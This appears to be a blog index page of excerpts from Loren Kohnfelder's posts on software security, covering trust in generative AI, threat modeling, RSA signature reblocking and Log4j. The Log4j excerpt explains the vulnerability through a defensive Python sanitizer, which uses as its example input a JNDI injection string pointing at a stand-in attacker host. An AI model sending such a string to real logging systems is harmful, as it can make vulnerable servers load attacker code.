Trusting AI

Whenever considering applications that rely on generative AI, I believe we always need to ask whether we can trust it. And given the technology’s track record, it’s hard to imagine how we will honestly be able to say “100%” any time soon. That’s why, for the time being, I think the following guideline is very important.

[Read More]

Trusting AI

(220 words) June 2024 – Loren Kohnfelder

Whether or not this unscientific test is reliable, asking generative AI if a mushroom is safe to eat is a terrible idea if you are prepared to eat according to what it says: in my test it misclassified a highly toxic variety that looks like a common edible one. This illustrates my rule of thumb:

[Read More]

Better security discussions

I’ve been a fan of threat modeling for many years, but only recently have I come to see that it isn’t just behind-the-scenes work for software professionals to do. Threats and mitigations need to be part of any discussion about security. When news articles urgently warn of the latest zero-day, or privacy advocates decry the latest outrage from the big platforms, framing a good discussion requires outlining the threat model you are talking about.

[Read More]

Better security discussions

(900 words) May 2024 – Loren Kohnfelder

We understand software security best through specific threats and mitigations, articulated in openly shared threat models. Without this context we miss out on the meaningful security discussions we badly need.

[Read More]

On the Signature Reblocking Problem in Public Key Cryptosystems

In Chapter 5 of the book I write about my good fortune in meeting two of the RSA algorithm inventors at MIT, and collaborating with them. As soon as I had a chance to read their (as yet unpublished) paper, the “reblocking problem” bothered me as a rather awkward implementation detail. This refers to a technical issue described in Section X (Avoiding “Reblocking” When Encrypting A Signed Message) of the foundational RSA paper, summarized in a nutshell in its first sentence.
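To see the issue concretely, here is a minimal sketch with hypothetical textbook-sized toy RSA numbers (illustrative only, nothing from the paper): when a message is signed under the sender’s modulus and must then be encrypted under a smaller recipient modulus, most signature values are simply too large to fit in one block.

```python
# Toy sketch of the reblocking problem (hypothetical toy RSA keys,
# for illustration only). A signature is computed modulo the signer's n;
# to encrypt it for the recipient it must fit below the recipient's n.

signer_n, signer_d = 61 * 53, 2753   # toy signing key, n = 3233
recipient_n = 11 * 13                # toy recipient modulus, n = 143

# Signing maps messages to values in [0, 3233); only values below 143
# can be encrypted directly under the recipient's smaller modulus.
# The rest would need to be "reblocked" (split or re-encoded) first.
oversized = [m for m in range(2, 200)
             if pow(m, signer_d, signer_n) >= recipient_n]
print(len(oversized) > 0)  # True: some signatures don't fit
```

The fix suggested in the RSA paper’s Section X amounts to ordering the operations or the moduli so that the value always fits, which is exactly the awkwardness the post discusses.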

[Read More]

Learning from Log4j

With Log4j very much in the news, if I could update my new book by magic, this would make a terrific real-world example to write about because it ties together a number of topics in the book. The vulnerability stems from a failure to sanitize untrusted inputs, enabling an injection attack that can potentially reach arbitrary targets using authentication credentials held by the target server. All the attacker has to do is craft an attack string that manages to get logged somehow, and the widely used Apache Log4j 2 component executes whatever the attacker commands.
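To make the failure mode concrete, here is a minimal sketch (in Python, purely illustrative; Log4j itself is Java, and this is not its actual patch): the danger is that the logger interprets `${...}` lookup syntax embedded in logged strings, so a crafted value like `${jndi:ldap://...}` triggers a remote lookup when logged. Neutralizing that syntax in untrusted input before it reaches the logger removes the trigger.

```python
# Illustrative sketch of sanitizing untrusted input before logging.
# The Log4j attack works because "${...}" inside a logged string is
# interpreted as a lookup (e.g. a JNDI fetch), not treated as text.
import re

LOOKUP = re.compile(r"\$\{[^}]*\}")  # matches ${...} lookup patterns

def sanitize_for_log(untrusted: str) -> str:
    """Replace ${...} patterns so the logger treats the input as plain text."""
    return LOOKUP.sub("[lookup-removed]", untrusted)

attack = "user-agent: ${jndi:ldap://attacker.example/x}"
print(sanitize_for_log(attack))  # user-agent: [lookup-removed]
```

In practice the real remedies were upgrading Log4j and disabling message lookups; the sketch only shows the general principle of not letting untrusted input reach an interpreter intact.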

[Read More]

A Wicked Problem

A wicked problem is one that is difficult even to describe clearly because of its diffuse and interconnected nature, and this is a useful lens through which to view software security. How are we doing overall at software security? How do you even define the standard to measure against?

[Read More]

Vulnerabilities are Mistakes

Spilled coffee beans, breaking the sound barrier, and software security

The Right Stuff is Tom Wolfe’s popular history of the US astronaut program, and it begins by recounting the early effort to break the sound barrier which involved such frequent crashes that there were weekly funerals for test pilots. What’s most striking about the account of this early period in what would become the space program is how the pilots gathering to bury their comrades would invariably talk themselves into believing that they would never have crashed — it was always the other guy who messed up and sadly paid the price.

[Read More]